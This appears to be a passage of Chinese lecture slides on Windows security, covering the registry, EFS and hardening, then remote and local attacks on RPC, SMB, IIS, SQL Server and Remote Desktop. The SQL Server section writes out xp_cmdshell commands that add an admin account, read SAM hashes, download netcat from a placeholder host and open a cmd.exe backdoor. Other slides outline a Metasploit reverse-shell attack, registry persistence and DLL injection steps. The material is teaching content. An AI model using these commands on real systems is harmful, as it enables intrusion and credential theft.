6種審計日志應(yīng)用程序日志應(yīng)用程序和系統(tǒng)產(chǎn)生的事件系統(tǒng)日志操作系統(tǒng)自身產(chǎn)生的事件，包括驅(qū)動等組件安全日志安全事件相關(guān)信息例如：與監(jiān)視系統(tǒng)、用戶和進(jìn)程活動相關(guān)的信息；啟動失敗等安全服務(wù)相關(guān)信息目錄服務(wù)日志文件復(fù)制日志 DNS服務(wù)日志事件查看器審計系統(tǒng)服務(wù)對象管理器有效的Win32函數(shù) 調(diào)用審計系統(tǒng)服務(wù)的進(jìn)程必須具有SeAuditPrivilege特權(quán) 可以防止惡意“淹沒”“安全日志” Windows系統(tǒng)的審計數(shù)據(jù)二進(jìn)制結(jié)構(gòu)文件形式存于物理磁盤每條記錄：事件發(fā)生事件事件源 Windows安全技術(shù) Windows NT/2000/XP中的常用安全技術(shù) Windows身份驗(yàn)證與訪問控制 Windows審核機(jī)制 Windows注冊表 Windows加密文件系統(tǒng) Windows基準(zhǔn)安全注意事項(xiàng) Windows的注冊表早期，對系統(tǒng)環(huán)境的配置通過*.ini進(jìn)行 Windows95之后，注冊表 注冊表是一種數(shù)據(jù)庫集中存儲各種信息資源，包括各種配置信息 注冊表的“鍵”和“鍵值” 注冊表編輯器：樹型 系統(tǒng)定義關(guān)鍵字（預(yù)定義關(guān)鍵字）應(yīng)用程序定義關(guān)鍵字鍵值：值的名稱＋值的數(shù)據(jù)類型＋值系統(tǒng)預(yù)定義的5個組關(guān)鍵字 HKEY_CLASSES_ROOT HKEY_CURRENT_USER HKEY_LOCAL_MACHINE HKEY_USERS HKEY_CURRENT_CONFIG HKEY_CLASSES_ROOT HKEY_CURRENT_USER HKEY_LOCAL_MACHINE 用來控制系統(tǒng)和軟件的設(shè)置針對所有用戶，是公共配置信息，與具體用戶無關(guān) 5個子鍵 HKEY_USERS 各個用戶相關(guān)的設(shè)置桌面、背景、開始菜單程序項(xiàng)、等等 HKEY_CURRENT_CONFIG 計算機(jī)的當(dāng)前配置情況顯示器、打印機(jī)等可選外部設(shè)備及其配置信息 … 注冊表的備份與恢復(fù)導(dǎo)出導(dǎo)入注冊表安全默認(rèn)，注冊表的安全級別較高管理員：完全訪問權(quán)限其他用戶：自己用戶賬戶相關(guān)的特權(quán)指派 Windows安全技術(shù) Windows NT/2000/XP中的常用安全技術(shù) Windows身份驗(yàn)證與訪問控制 Windows審核機(jī)制 Windows注冊表 Windows加密文件系統(tǒng) Windows基準(zhǔn)安全注意事項(xiàng) Windows加密文件系統(tǒng)加密文件系統(tǒng)，Encrypted File System，EFS 用于在NTFS上存儲已加密的文件加密過程對用戶透明與使用未加密文件和文件夾一樣 文件/文件夾（推薦）加密屬性加密示例命令行加密命令cipher EFS注意點(diǎn)只有NTFS上的文件和文件夾才能被加密不能加密壓縮的文件或文件夾加密的文件被復(fù)制或移動到非NTFS格式的卷上，會被解密非加密文件移動到加密文件夾中，自動加密。 反之不成立。 “系統(tǒng)”屬性的文件，無法加密。位于%SYSTEMROOT%目錄結(jié)構(gòu)中的文件，也是如此加密文件或文件夾不能防止刪除/列出文件/目錄建議結(jié)合NTFS的訪問控制來使用EFS 在允許進(jìn)行遠(yuǎn)程加密的遠(yuǎn)程計算機(jī)上可以加密/解密文件/目錄。但，在網(wǎng)絡(luò)上傳輸?shù)臄?shù)據(jù)并未加密 EFS 對稱加密技術(shù)＋非對稱加密技術(shù)文件加密密鑰與用戶的EFS證書對應(yīng)的公鑰 EFS的故障恢復(fù)策略故障恢復(fù)代理 指獲得授權(quán)解密由其他用戶加密的數(shù)據(jù)的個人 Windows安全技術(shù) Windows NT/2000/XP中的常用安全技術(shù) Windows身份驗(yàn)證與訪問控制 Windows審核機(jī)制 Windows注冊表 Windows加密文件系統(tǒng) Windows基準(zhǔn)安全注意事項(xiàng) Windows基準(zhǔn)安全注意事項(xiàng)驗(yàn)證所有磁盤分區(qū)是否都用NTFS格式化禁用不必要的服務(wù)禁用或刪除不必要的賬戶確保禁用來賓（guest）賬戶防止注冊表被匿名訪問限制對LSA信息進(jìn)行訪問設(shè)置密碼策略設(shè)置賬戶鎖定策略配置管理員賬戶安裝防毒軟件和更新安裝最新的Service Pack 安裝適當(dāng)?shù)腟ervice Pack后的安全修補(bǔ)程序補(bǔ)充安全設(shè)置 Windows 系統(tǒng)遠(yuǎn)程攻防技術(shù)基本遠(yuǎn)程攻擊技術(shù)遠(yuǎn)程口令猜測與破解攻擊暴力破解基于字典的猜測中間人身份認(rèn)證欺騙攻擊攻擊Windows網(wǎng)絡(luò)服務(wù)利用Windows系統(tǒng)的網(wǎng)絡(luò)服務(wù)程序的漏洞進(jìn)行遠(yuǎn)程滲透攻擊攻擊Windows客戶端及用戶利用瀏覽器及應(yīng)用軟件客戶端進(jìn)行滲透攻擊 Windows系統(tǒng)的安全漏洞生命周期安全漏洞 Security Vulnerability，安全脆弱性一般認(rèn)為，漏洞是指硬件、軟件或策略上存在的的安全缺陷，從而使得攻擊者能夠在未授權(quán)的情況下訪問、控制系統(tǒng) Windows安全漏洞發(fā)現(xiàn)、利用與修補(bǔ)黑白道上的人致力于軟件安全性分析研究，發(fā)掘Windows操作系統(tǒng)組件、網(wǎng)絡(luò)服務(wù)以及第三方軟件中存在的安全漏洞。安全漏洞的披露方式軟件廠商 向公眾披露軟件缺陷將為攻擊者開發(fā)漏洞滲透攻擊代碼和制作惡意代碼提供幫助安全研究人員廠商希望掩蓋其失誤，公開披露漏洞信息將使企業(yè)和個人能夠更好地保護(hù)他們的系統(tǒng)。不穩(wěn)定的妥協(xié)安全研究人員向廠商通報漏洞信息，等待廠商公布補(bǔ)丁軟件后再向公眾公開，廠商則給予研究人員相應(yīng)的榮譽(yù)。 Windows安全漏洞 Windows安全漏洞發(fā)布 Microsoft Security Bulletin: http://www.microsoft.com/technet/security/current.aspx 微軟安全公告: http://www.microsoft.com/china/technet/security/current.mspx 微軟安全漏洞編號方式: MSXX(年份編號)-0XX(漏洞發(fā)布次序) 遠(yuǎn)程滲透可利用的安全漏洞安全漏洞后果類型: 遠(yuǎn)程執(zhí)行代碼安全漏洞危害等級: 重要或嚴(yán)重本地滲透可利用的安全漏洞安全漏洞后果類型: 本地特權(quán)提升安全漏洞危害等級: 重要或嚴(yán)重當(dāng)前的漏洞趨勢每年公布的漏洞數(shù)量 總結(jié)當(dāng)前的許多攻擊受到經(jīng)濟(jì)利益驅(qū)使 Web應(yīng)用程序漏洞占一半比例瀏覽器漏洞下降，但插件帶來更多地威脅在對抗共同攻擊方面有所進(jìn)展移動平臺受到更多的關(guān)注如何對特定目標(biāo)進(jìn)行遠(yuǎn)程滲透測試? 漏洞掃描: 確定目標(biāo)系統(tǒng)存在哪些已知漏洞 Nessus/XScan/… 如何查看漏洞掃描結(jié)果安全漏洞索引: Nessus ID –MS安全漏洞編號–CVE安全漏洞編號–BID編號 Nessus ID 19402 -> MS05-039 -> CVE-2005-1983 -> BID 14513 了解安全漏洞細(xì)節(jié)信息根據(jù)安全漏洞編號找出安全漏洞具體描述信息安全漏洞影響軟件范圍、攻擊目標(biāo)服務(wù)、具體位置、后果類型、嚴(yán)重等級… 如何對特定目標(biāo)進(jìn)行遠(yuǎn)程滲透測試? 查找已知安全漏洞的滲透攻擊代碼黑客社區(qū)重要的共享資源并非每個已知安全漏洞都存在公開滲透代碼軟件流行度、漏洞危害后果類型和等級: 滲透代碼價值安全漏洞補(bǔ)丁情況: 滲透代碼的有效性安全漏洞利用難度: 滲透代碼編寫代價并非所有滲透代碼都會公開滲透代碼(特別是0day)存在重要價值獲取到的滲透代碼并非所有情況都適用目標(biāo)系統(tǒng)操作系統(tǒng)平臺差異，語種差異→用于覆蓋的ret值差異著名滲透代碼資源: milw0rm， bid， metasploit， packetstorm， FrSIRT(not free)… 如何對特定目標(biāo)進(jìn)行遠(yuǎn)程滲透測試? 滲透測試選擇特定目標(biāo)存在安全漏洞對應(yīng)的滲透代碼遠(yuǎn)程滲透: 安全漏洞可通過網(wǎng)絡(luò)服務(wù)進(jìn)行利用想拿到shell: 安全漏洞后果為遠(yuǎn)程執(zhí)行代碼了解滲透代碼和攻擊目標(biāo)軟件環(huán)境的匹配性攻擊目標(biāo)軟件環(huán)境: 操作系統(tǒng)版本、語種、網(wǎng)絡(luò)服務(wù)版本， … 滲透代碼支持范圍只支持/測試過哪些目標(biāo)環(huán)境自己擴(kuò)展?jié)B透代碼所支持的范圍: 進(jìn)階課程<緩沖區(qū)溢出和Shellcode> 進(jìn)行實(shí)際滲透測試實(shí)驗(yàn)享受成功的喜悅直面失敗的郁悶，找出問題并解決: 從腳本小子到技術(shù)高手的必經(jīng)之路 RPC服務(wù)最普遍的模式和執(zhí)行是開放式軟件基礎(chǔ)的分布式計算環(huán)境（DCE） MS RPC 與其兼容攻擊Windows RPC服務(wù) MS RPC服務(wù) TCP 135 RPC本身漏洞: MS07-029、MS04-012、MS03-039、MS03-026、… 利用RPC服務(wù)利用漏洞: MS04-011、… SMB 協(xié)議 SMB(Server Message Block)通信協(xié)議 1987年制定，作為Microsoft網(wǎng)絡(luò)的通訊協(xié)議。 SMB使用了NetBIOS的API接口 一個開放性的協(xié)議，允許協(xié)議擴(kuò)展變得更大而且復(fù)雜大約65個最上層的作業(yè)，而每個作業(yè)都超過120個函數(shù)，甚至Windows NT也沒有全部支持到，微軟把 SMB 改名為 CIFS(Common Internet File System)。 SMB協(xié)議是基于TCP， 端口使用為139，445 攻擊Windows SMB服務(wù) SMB服務(wù)TCP 139/445 SMB本身漏洞: MS08-063、MS07-063、MS05-027 利用SMB服務(wù)利用漏洞: 非常多即插即用服務(wù): MS07-019、MS05-047、MS05-039 活動目錄服務(wù): MS08-060、MS07-039  MS DTC MS DTC(Distributed Transaction Coordinator) 微軟分布式傳輸協(xié)調(diào)程序調(diào)用系統(tǒng)Microsoft Personal Web Server和Microsoft SQL Server 該服務(wù)用于管理多個服務(wù)器攻擊MSDTC服務(wù) MSDTC服務(wù)TCP 1025 MS05-051 IIS基礎(chǔ) Windows 攻擊場景演示配置 Nessus 掃描靶機(jī)通過Metasploit 攻擊MS03-026 漏洞，獲得遠(yuǎn)程訪問權(quán)在攻擊機(jī)上運(yùn)行Metasploit ， 可以查找到攻擊漏洞MS03-026 的exploit (windows / dcerpc / ms03_026_dcom) 以及一個可用的payload (generic / shell_reverse_tcp)。其中，該payload 的作用是讓靶機(jī)返回一個命令行。在攻擊機(jī)上鍵入以下命令，對靶機(jī)進(jìn)行攻擊。 攻擊成功后獲得了靶機(jī)的一個命令行。編寫FTP批處理命令，下載本地攻擊文件獲得了靶機(jī)的命令行后，先在C盤創(chuàng)建一個文件夾hidennc，這是存放后門創(chuàng)建所需文件的文件夾。 執(zhí)行完上述命令后，可以在C盤hidennc文件夾下面看到命令列表command.txt，以及從FTP服務(wù)器下載的三個文件。使用netcat添加命令行后門 Netcat是一個功能強(qiáng)大的工具，但大小僅為60KB，所以被譽(yù)為瑞士軍刀。Netcat可以通過若干選項(xiàng)的組合，達(dá)到創(chuàng)建后門的效果。一個可行的方案為添加注冊表自啟動項(xiàng)使得后門開機(jī)自啟動從FTP服務(wù)器下載的三個文件中，有個一名為AddReg.bat。這個批命令程序修改了注冊表的啟動項(xiàng)，使得靶機(jī)在開機(jī)階段自動運(yùn)行netcat創(chuàng)建的后門。其中注冊表的啟動項(xiàng)為 AddReg.bat的內(nèi)容為使用reg命令(1) AddReg.bat的內(nèi)容為使用reg命令(2) 運(yùn)行完AddReg.bat，靶機(jī)的注冊表啟動項(xiàng)被修改使用AFXRootkit隱藏后門進(jìn)程、文件、注冊表項(xiàng)當(dāng)hidennc下面出現(xiàn)hook.dll文件時，后門隱藏成功。使用netcat連接后門，執(zhí)行指定攻擊命令 IIS基礎(chǔ) IIS (Intenet Information Services， Internet信息服務(wù)) 微軟在Windows服務(wù)器操作系統(tǒng)中集成的Web/FTP/Email/NNTP網(wǎng)絡(luò)服務(wù) HTTP: 基于文本的Web應(yīng)用協(xié)議 CGI (common gateway interface) 給HTTP請求加上動態(tài)能力，生成相應(yīng)動態(tài)頁面 CGI程序在服務(wù)器端被調(diào)用執(zhí)行，反饋動態(tài)執(zhí)行結(jié)果 ASP (Active Server Pages) VBScript等腳本語言編寫克服CGI效率低下，由服務(wù)器解釋執(zhí)行 ISAPI 因特網(wǎng)服務(wù)器應(yīng)用編程接口通過ISAPI動態(tài)鏈接庫擴(kuò)展IIS本身功能` 各種版本安全性 IIS的發(fā)展伴隨著安全漏洞；隨著IIS 6.0的發(fā)布，這種情況有所好轉(zhuǎn)。 在低于6.0的版本中，其用戶權(quán)限是系統(tǒng)用戶；而在IIS 6.0中，引入了網(wǎng)絡(luò)服務(wù)帳戶，這是一個限制用戶。這樣，即使服務(wù)遭到破壞，也不會造成系統(tǒng)的癱瘓。 IIS進(jìn)程模型-IIS6之前 IIS進(jìn)程(inetinfo.exe)運(yùn)行在LocalSystem帳戶環(huán)境靜態(tài)內(nèi)容請求: IIS進(jìn)程為來自因特網(wǎng)匿名用戶創(chuàng)建一個臨時用戶帳戶并提供服務(wù): IUSER_MACHINENAME帳戶 ASP/ISAPI內(nèi)容請求 IIS4: ISAPI都以LocalSystem身份運(yùn)行在inetinfo進(jìn)程內(nèi) IIS5: OOP(進(jìn)程外)模式， ISAPI以IWAM_MACHINENAME身份(Guests用戶組)運(yùn)行在dllhost.exe進(jìn)程 IIS進(jìn)程模型-IIS6 IIS6進(jìn)程模型 HTTP監(jiān)聽進(jìn)程(listener， HTTP.sys): Windows內(nèi)核模式TCP/IP協(xié)議棧工作進(jìn)程(worker): 用戶模式，負(fù)責(zé)處理各個HTTP請求用到的ISAPI/API腳本和COM組件均運(yùn)行在負(fù)責(zé)具體處理這一請求的工作進(jìn)程 IIS中的FTP/NNTP/SMTP仍由inetinfo進(jìn)程負(fù)責(zé)處理 IIS的工作流程 HTTP.SYS 一個內(nèi)核模式網(wǎng)絡(luò)驅(qū)動程序。從結(jié)構(gòu)上來講，HTTP.SYS是位于TCPIP.SYS之上的。一個請求首先由TCPIP.SYS處理，然后才轉(zhuǎn)發(fā)到HTTP.SYS上；同理，該請求被Web應(yīng)用程序處理后作為響應(yīng)返回時則是先到達(dá)HTTP.SYS在轉(zhuǎn)發(fā)到TCPIP.SYS最后到達(dá)客戶端瀏覽器。 TCPIP.SYS和HTTP.SYS都處于內(nèi)核模式下。 HTTP.SYS功能特點(diǎn)(1) 監(jiān)聽用戶（來自于TCPIP.SYS）的HTTP請求。 驗(yàn)證HTTP請求。 URL和Header長度等如果驗(yàn)證沒有通過則直接返回否則將WEB請求放到適當(dāng)請求隊(duì) 列中，并對其進(jìn)行排隊(duì)。 HTTP.SYS功能特點(diǎn)(2) 路由HTTP請求到正確的WEB應(yīng)用程序池。 HTTP.SYS中維護(hù)著一個從URL到WEB應(yīng)用程序池的對應(yīng)關(guān)系路由表（映射表），所以HTTP.SYS可以迅速將WEB請求轉(zhuǎn)發(fā)到web應(yīng)用程序。如果WEB請求沒找到相應(yīng)的映射，則返回404錯誤，即常見的那個并不雅觀的頁面。也可以自己畫一個漂亮的將這個頁面覆蓋掉。安全性有嗎？ HTTP.SYS功能特點(diǎn)(3) 緩存web應(yīng)用程序?qū)τ谠撜埱蟮捻憫?yīng)結(jié)果。當(dāng)同一請求被頻繁訪問時可以不必轉(zhuǎn)發(fā)到Web應(yīng)用程序，直接從此緩存中將結(jié)果返回給用戶，大大提高了其響應(yīng)速度。 實(shí)現(xiàn)比如連接限制、連接超時、消息隊(duì)列長度限制以及IIS寬帶限制等控制。 WEB應(yīng)用程序池 WWW Admin Service (WAS) 一個管理和監(jiān)視工作進(jìn)程的組件，位于它宿主在SveHost.exe中，運(yùn)行在用戶模式下。當(dāng)運(yùn)行IIS的InetInfo.exe服務(wù)啟動后，WAS服務(wù)(SvcHost.exe)也隨之啟動。此時WAS從InetInfo的MeteBase中讀取配置信息并且初始化HTTP.SYS中的Namespace路由表(Namespace mapper)，HTTP.SYS通過路由表中的數(shù)據(jù)條目來判定Web請求的URL所對應(yīng)的應(yīng)用程序池。此時，HTTP.SYS就會向WEB應(yīng)用程序池發(fā)出啟動工作進(jìn)程的指令。。 工作進(jìn)程(W3WP.EXE) 一個用戶模式下負(fù)責(zé)處理WEB請求的程序，如處理返回靜態(tài)頁的請求，調(diào)用ISAPI擴(kuò)展或ISAPI篩選器，運(yùn)行CGI(Common Gateway Interface)。工作進(jìn)程接收來自HTTP.SYS的WEB請求和向HTTP.SYS發(fā)送該請求的WEB響應(yīng)。同時也會運(yùn)行WEB應(yīng)用程序代碼，比如Asp.net Application和XML Web Service。工作進(jìn)程主要通過程序集W3Core.DLL來實(shí)現(xiàn)所有WEB請求的處理邏輯。 WEB請求的整體流程步驟1 HTTP.SYS收到來自客戶端瀏覽器的WEB請求后，判斷請求的類型（HTTP或HTTPS），如果請求類型為HTTPS，HTTP.SYS會把這個請求放置到LSASS.EXE中的SSL隊(duì)列。對于SSL請求，HTTPFilter會執(zhí)行下面的步驟： 1) 監(jiān)聽被添加到SSL隊(duì)列的請求 2) 從SSL隊(duì)列中取出請求 3) 通過SSL解密來自HTTP.SYS的請求 4) 將解密后的請求返回給HTTP.SYS等待處理。步驟2 HTTP.SYS判斷請求的有效性。如果請求無效，則會直接返回400的錯誤頁至客戶端；如果請求有效，HTTP.SYS會檢查在Response Cache是否已經(jīng)存在針對該請求的響應(yīng)。 步驟3 HTTP.SYS檢查Response Cache： 1) 如果響應(yīng)存在，則立即返回響應(yīng)而不必將請求轉(zhuǎn)發(fā)到用戶模式下的工作進(jìn)程處理。 2) 如果響應(yīng)不存在，HTTP.SYS會根據(jù)namespace Map映射表來判定將該請求放到哪個應(yīng)用程序池對應(yīng)的隊(duì)列中，然后將請求放入此隊(duì)列。 3) 如果沒找到該應(yīng)用程序池對應(yīng)的隊(duì)列，或者這個隊(duì)列已經(jīng)滿了，HTTP.SYS會返回一個503的錯誤頁給客戶端。步驟4 當(dāng)請求放置到隊(duì)列后，HTTP.SYS會查看有沒有有效的且可以啟動的工作進(jìn)程，如果沒有，HTTP.SYS會告訴WAS(svchost.exe)啟動一個工作進(jìn)程(w3wp.exe)。 步驟5 啟動工作進(jìn)程過程中會在啟動工作進(jìn)程的過程中加載相應(yīng)的ISAPI（非托管代碼）以及CLR（托管代碼）、創(chuàng)建應(yīng)用程序域等操作。然后從HTTP.SYS的請求隊(duì)列中取出該web請求進(jìn)行相應(yīng)的處理。 步驟6 將根據(jù)請求得到的web響應(yīng)結(jié)果返回給HTTP.SYS并指示HTTP.SYS是否將該響應(yīng)緩存到Response Cache。步驟7 HTTP.SYS判斷響應(yīng)類型(HTTP或HTTPS)，如果是HTTPS類型的響應(yīng)，HTTP.SYS就會將請求放到HTTP SSL(HTTPFilter)的隊(duì)列中。對于SSL響應(yīng)，即HTTPS類型的響應(yīng)，HTTP SSL(HTTPFilter)會按以下步驟執(zhí)行： 1) 監(jiān)聽放入SSL隊(duì)列的響應(yīng) 2) 取出放入SSL隊(duì)列的響應(yīng) 3) 通過SSL加密響應(yīng) 4) 將加密后的響應(yīng)返回給HTTP.SYS 步驟8 HTTP.SYS將響應(yīng)結(jié)果返回給客戶端并記錄針對該響應(yīng)的請求（如果可以記錄的話）。如果有相同請求進(jìn)來的話，會直接將其響應(yīng)結(jié)果從Response Cache中去出來返回給客戶端，加快WEB請求的響應(yīng)速度。攻擊Windows因特網(wǎng)服務(wù): IIS IIS6之前曾是臭名昭著充斥安全漏洞進(jìn)攻路線：信息泄漏、目錄遍歷、緩沖區(qū)溢出信息泄漏：MS01-004， MS00-006， MS00-058， WebDAV Search， … 目錄遍歷：古老技術(shù)../ IIS 2.0， Unicode編碼， MS00-086/MS01-026(綠盟)， … 緩沖區(qū)溢出：MS04-011， MS04-036， … IIS6推出后安全性得到大幅提升，仍存安全漏洞 MS08-006， MS07-041 IIS7.0的漏洞公告 IIS7.5的漏洞公告 IIS攻擊手段通用防范措施及時打系統(tǒng)補(bǔ)丁禁用用不著的ISAPI功能擴(kuò)展模塊和過濾器單獨(dú)文件卷上部署虛擬根目錄使用NTFS文件系統(tǒng)禁用不必要的服務(wù)根據(jù)MS提供的IIS安全核對清單(Check List) 利用IIS Lockdown等增強(qiáng)IIS服務(wù)安全性使用Web服務(wù)器安全評估工具了解和修補(bǔ)安全威脅攻擊MS SQL Server SQL Server信息收集端口掃描: TCP 1433端口 SQLPing: SQL服務(wù)器名稱/實(shí)例名稱/版本號/端口號/命名管道 SQL Server黑客工具和技術(shù)基本SQL查詢工具: Query Analyzer， osql命令行 SQL口令破解: sqldict， sqlbf， sqlpoke 嗅探SQL Server口令字: SQL Server明文傳輸口令字(XOR編碼) Web服務(wù)器源代碼泄漏: 泄漏連接字符串(包含口令字) 攻擊已知SQL Server漏洞 SQL注入攻擊已知SQL Server漏洞 SQL Server 2K解析服務(wù)緩沖區(qū)溢出漏洞 David Litchfield， MS02-039 2003年1月: SQL Slammer蠕蟲基于UDP， 376字節(jié)單數(shù)據(jù)包: 集成目標(biāo)地址生成，漏洞攻擊，自身傳播等模塊第一個帶寬限制型蠕蟲，10分鐘掃遍幾乎攻陷全部存有漏洞主機(jī)，75K臺主機(jī)受感染擴(kuò)展存儲過程輸入?yún)��?shù)分析漏洞: MS00-092 存儲過程權(quán)限漏洞: MS00-048 SQL查詢?yōu)E用漏洞: MS00-014 特權(quán)提升漏洞: MS08-040 MS SQL Server 2008 R2 for 32-bit Systems 利用SQL擴(kuò)展存儲過程操縱目標(biāo)擴(kuò)展存儲過程(extended stored procedure， XP) 黑客最青睞的SQL Server XP: xp_cmdshell SQL Server運(yùn)行在LocalSystem帳戶環(huán)境下: 最高權(quán)限，沒有什么事是它不能做的！利用SQL擴(kuò)展存儲過程操作目標(biāo)系統(tǒng)添加Admin帳戶: xp_cmdshell „net user found stone /ADD‟ xp_cmdshell „net localgroup /ADD Administrators found‟ 讀取Administrator帳戶口令密文: Administrator無法訪問 xp_regread „HKEY_LOCAL_MACHINE‟， „SECURITY\SAM\Domains\Account\Users\000001F4‟，‟F‟ 利用SQL擴(kuò)展存儲過程操縱目標(biāo)利用SQL擴(kuò)展存儲過程上傳后門 EXEC xp_cmdshell „echo open xxx.xxx.xxx.xxx > ftptemp‟ EXEC xp_cmdshell „echo user anonymous xxx@xx.com >> ftptemp‟ EXEC xp_cmdshell „echo bin >> ftptemp‟ EXEC xp_cmdshell „echo get nc.exe >> ftptemp‟ EXEC xp_cmdshell „echo bye >> ftptemp‟ EXEC xp_cmdshell „ftp -n –s:ftptemp‟ EXEC xp_cmdshell „erase ftptemp‟ EXEC xp_cmdshell „start nc -L -d -p 2002 -e cmd.exe‟ nc -vv xxx.xxx.xxx.xxx 2002 獲得遠(yuǎn)程訪問shell MS SQL Server防范措施發(fā)現(xiàn)網(wǎng)絡(luò)上的所有SQL Server SQLPing， SQL Scan(MS)等阻斷不可信客戶對SQL Server端口的訪問配置防火墻規(guī)則及時打好補(bǔ)丁 Windows Update并不具備自動搜索和實(shí)施SQL Server補(bǔ)丁的功能網(wǎng)管應(yīng)關(guān)注SQL Server的Service Pack和Hotfix，并進(jìn)行升級和補(bǔ)丁修補(bǔ)強(qiáng)口令字，特別是sa帳戶盡可能使用Windows Only身份驗(yàn)證模式 MS Terminal Services(遠(yuǎn)程桌面) 服務(wù)器遠(yuǎn)程管理桌面: 桌面操作系統(tǒng)Win2K Pro， WinXP 終端服務(wù): Win2K中稱為應(yīng)用服務(wù)器遠(yuǎn)程桌面協(xié)議 RDP (Remote Desktop Protocol): TCP 3389 客戶端 RDC (Remote Desktop Connection) Run “mstsc” 遠(yuǎn)程桌面Web連接(RDWC: Remote Desktop Web Connection)： ActiveX/COM對象，嵌入瀏覽器的客戶程序，通過RDP連接服務(wù)器攻擊“遠(yuǎn)程桌面” 尋找和探查遠(yuǎn)程桌面通過搜索引擎查找RDWC: TSWeb\default.htm 通過TCP 3389端口尋找遠(yuǎn)程桌面服務(wù)非標(biāo)準(zhǔn)端口的遠(yuǎn)程桌面查找 ProbeTS， TSEnum， 終端服務(wù)管理器攻擊遠(yuǎn)程桌面猜測口令字 TSGrinder2， TSCrack 竊聽攻擊 RDP加密實(shí)現(xiàn)缺陷MS02-051 “遠(yuǎn)程桌面”基本安全原則使用強(qiáng)口令字設(shè)置帳戶鎖定閾值(雖然對遠(yuǎn)程桌面交互式登錄無效)，設(shè)置登錄警告升級/跟進(jìn)補(bǔ)丁服務(wù)器操作系統(tǒng): 升級至Windows Server 2008 桌面操作系統(tǒng): 必要時才開放“遠(yuǎn)程協(xié)助” “Remote Desktop Users”用戶組使用組策略管理RDU用戶組權(quán)限軟件限制策略（限制特定用戶組能夠使用哪些應(yīng)用程序）終端服務(wù)的嚴(yán)格配置 Windows本地攻擊 Windows本地攻擊本地權(quán)限提升(特權(quán)提升) 破解本地安全漏洞破解口令字竊取敏感信息掩蹤滅跡遠(yuǎn)程控制和后門破解漏洞進(jìn)行本地權(quán)限提升 Guest→Administrator getadmin系列針對NT4的權(quán)限提升攻擊工具基本技術(shù)：“DLL注入” 假造LPC端口請求: MS00-003 命名管道預(yù)知: MS00-053 NetDDE服務(wù)漏洞: MS01-007 Windows調(diào)試器攻擊: MS03-013 破解漏洞進(jìn)行本地權(quán)限提升 DLL 注入（1） DLL：動態(tài)鏈接庫封裝大量函數(shù)，實(shí)現(xiàn)模塊化的工程管理。提供API接口，調(diào)用前需要事先引用、聲明，也可以動態(tài)的加載。需要載入DLL，獲取函數(shù)地址然后才能調(diào)用。 惡意代碼編寫質(zhì)量的好壞取決于其隱藏程度。如果是EXE文件，則將會產(chǎn)生一個進(jìn)程，很容易發(fā)現(xiàn)�？梢赃x擇為 DLL 文件，DLL 文件加載到進(jìn)程的地址空間中，不會有進(jìn)程名。 DLL文件如果不被進(jìn)程加載又如何在進(jìn)程中？強(qiáng)制讓某進(jìn)程加載DLL文件，即創(chuàng)建遠(yuǎn)程線程將DLL注入到某個指定的進(jìn)程中。 DLL注入（2）把DLL “寫入”另一個程序的運(yùn)行空間去。 EXE在啟動時需要加載很多DLL，內(nèi)存中這些DLL和EXE所在的地址空間是不一樣的，而只有加載進(jìn)一個DLL，系統(tǒng)才會為這個DLL分配地址和空間。實(shí)際上，強(qiáng)行讓另一個EXE載入（裝載）這個DLL。 DLL注入（3） DLL注入的目的主要是通過一個外部的、第三方的手段來讓另一個程序執(zhí)行作者并沒有意圖加入EXE的功能。外掛、程序修改器、曾經(jīng)的殺毒軟件木馬、病毒 正常使用的DLL注入有什么好處？作為一個外掛（外部掛接）程序來修改其他程序的內(nèi)容。作為監(jiān)控程序監(jiān)控另一個程序的運(yùn)行情況。 DLL注入（4）惡意使用的DLL注入有什么好處？一旦注入正常程序，例如svchost.exe，殺毒軟件監(jiān)控到的惡意操作的發(fā)起者就可能是這個正常程序，有白名單的殺毒軟件可能會放行。用戶看到正常程序正在進(jìn)行可疑操作的時候有可能會點(diǎn)擊殺毒軟件的放行從而讓病毒得逞。 Windows自帶的防火墻并不會阻止可信程序發(fā)起的網(wǎng)絡(luò)連接，而這個可信程序僅僅是通過文件名來判斷的。 DLL注入的方法（1） HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs里面的DLL會被加載到幾乎每個進(jìn)程中，只要進(jìn)程加載user32.dll，這里面的DLL就會同時附載到那個進(jìn)程上。 user32.dll是Windows用戶API接口的鏈接庫(Windows User API Client DLL)，幾乎每個程序都會用到它。 從Vista起，這個鍵值由于安全問題，默認(rèn)是被禁止的。 Windows 7起，包括Windows 8 R2，這個鍵值被RequireSignedAppInit_DLLs 取代，雖然加載DLL，但是只能加載帶有數(shù)字簽名的DLL。 DLL注入的方法（2）進(jìn)程使用CreateRemoteThread和類似的函數(shù)則可在運(yùn)行時注入DLL。 1、獲取目標(biāo)進(jìn)程的句柄。 2、在目標(biāo)進(jìn)程中分配一定內(nèi)存，把要注入的DLL名稱寫進(jìn)去。當(dāng)然，這一步也可能省略，如果加載一個名為？32.dll的dll，就不必寫入內(nèi)存，也可以繞過部分監(jiān)控軟件。 3、在目標(biāo)進(jìn)程中建立一個新線程，然后起始地址設(shè)置為LoadLibrary的地址，參數(shù)設(shè)置為剛才寫入的那個dll名稱。也可以直接在線程開始寫入可執(zhí)行代碼。 4、注入成功，現(xiàn)在操作系統(tǒng)就會調(diào)用DLLMain函數(shù)了。 DLL注入的方法（3）使用SetWindowsHookEx之類的Windows鉤子調(diào)用。 使用調(diào)試功能（Debugging）暫停所有線程，然后劫持一個存在的線程，再用它執(zhí)行注入代碼。 使用Windows程序中的字符限制漏洞來利用LoadLibrary函數(shù)加載DLL。獲取口令字密文口令字密文位置 NT4之前：SAM安全帳戶管理器 %systemroot%\system32\config\SAM 操作系統(tǒng)運(yùn)行期間鎖定，即使Admin帳戶也不能隨意查看和修改 Windows 2000/XP/2003: 活動目錄 %windir%\WindowsDS\ntds.dit 默認(rèn)大小10MB，加密格式獲取口令字密文的基本套路另一操作系統(tǒng)啟動－拷貝密文文件：物理訪問硬盤修復(fù)工具包rdisk創(chuàng)建SAM備份文件拷貝: rdisk /s- 竊聽Windows系統(tǒng)身份驗(yàn)證過程(網(wǎng)絡(luò)監(jiān)聽LanMan密文) 直接從SAM文件或活動目錄直接提取口令字密文直接提取口令字密文 pwdump (Jeremy Allison): 最早針對NT4 SAM直接提取口令字密文要求admin權(quán)限 NT4 SP2增強(qiáng)策略: SYSKEY機(jī)制 pwdump2(Todd Sabin): DLL注入方法將本身代碼加載到另一高優(yōu)先級進(jìn)程空間要求admin權(quán)限， samdump.dll庫文件 Windows 2000/XP/2003: 活動目錄 pwdump2的改進(jìn)版本 pwdump3e改進(jìn)版本: 